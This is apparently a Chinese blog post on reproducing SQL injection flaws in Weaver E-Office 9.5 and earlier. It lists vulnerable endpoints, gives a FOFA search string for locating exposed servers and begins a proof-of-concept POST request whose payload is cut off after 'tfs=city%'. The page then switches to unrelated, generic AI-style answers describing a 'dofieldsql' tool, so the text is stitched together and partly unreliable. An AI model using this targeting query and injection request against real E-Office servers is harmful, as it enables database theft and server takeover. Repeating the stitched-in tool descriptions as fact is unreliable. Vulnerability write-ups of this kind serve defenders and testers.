泛微E-Office SQL注入漏洞复现

0x01 产品简介

    泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

0x02 漏洞概述

    泛微e-office  json_common.php、flow_xml.php、sms_page.php、getUserLists、detail.php、Init.php等接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 影响范围

e-office <=9.5

0x04 复现环境 

FOFA:app="泛微-EOffice"

0x05 漏洞复现

PoC-1

POST /building/json_common.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city%
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: 泛微 dofieldsql 是一个在泛微OA平台中使用的一种数据操作工具。它可以通过执行SQL语句来对数据库中的数据进行增删改查的操作。 泛微 dofieldsql 具有以下几个特点和功能: 1. 数据操作灵活:通过编写SQL语句,可以对数据库中的不同表和字段进行操作,实现灵活的数据增删改查功能。 2. 数据安全性高:在进行数据操作之前,可以使用权限控制功能来限制用户的操作范围,确保敏感数据的安全性。 3. 数据操作效率高:泛微 dofieldsql 提供了一些优化功能,可以提升数据操作的效率。例如,可以对SQL语句进行优化,减少查询时间;还可以通过缓存等机制,提高数据读取的速度。 4. 数据操作可追溯:泛微 dofieldsql 可以记录每次数据操作的日志,包括操作时间、操作者等信息,方便管理员进行数据追踪和审核。 5. 数据操作支持批量处理:泛微 dofieldsql 支持批量操作数据,可以一次性对多条数据进行增删改查,提高操作效率。 总的来说,泛微 dofieldsql泛微OA平台中一种强大的数据操作工具,它可以帮助用户快速、灵活地进行各种数据操作,提高工作效率和数据安全性。 ### 回答2: 泛微 dofieldsql是一个企业级办公自动化软件的功能模块之一。它是泛微OA系统中的一个数据库访问接口,用于操作和管理数据库中的数据字段。 泛微 dofieldsql具有以下特点和功能: 1. 数据库操作:它可以实现对数据库中的数据进行增、删、改、查等操作,方便用户对数据进行管理和维护。 2. 数据字段管理:它可以对数据库表的字段进行管理,包括添加、删除、修改字段信息等功能,灵活满足企业的不同需求。 3. 数据库查询:它支持灵活的数据库查询语法,用户可以根据需要自行编写查询语句,从数据库中检索出符合条件的数据。 4. 数据权限控制:它可以实现对数据库中数据的访问权限控制,用户可以根据角色或者部门进行数据权限的配置,保证数据的安全性和隐私性。 5. 数据库连接池:它支持数据库连接池技术,提高数据库的访问效率和并发能力。 6. 数据库事务管理:它可以实现对数据库操作的事务管理,保证多个数据库操作的原子性,确保数据的一致性。 泛微 dofieldsql作为泛微OA系统的一部分,为企业提供了强大的数据库操作和管理功能,可以帮助企业提升工作效率,提高数据的管理和安全性。同时,它也提供了灵活的配置和扩展接口,满足不同企业的个性化需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值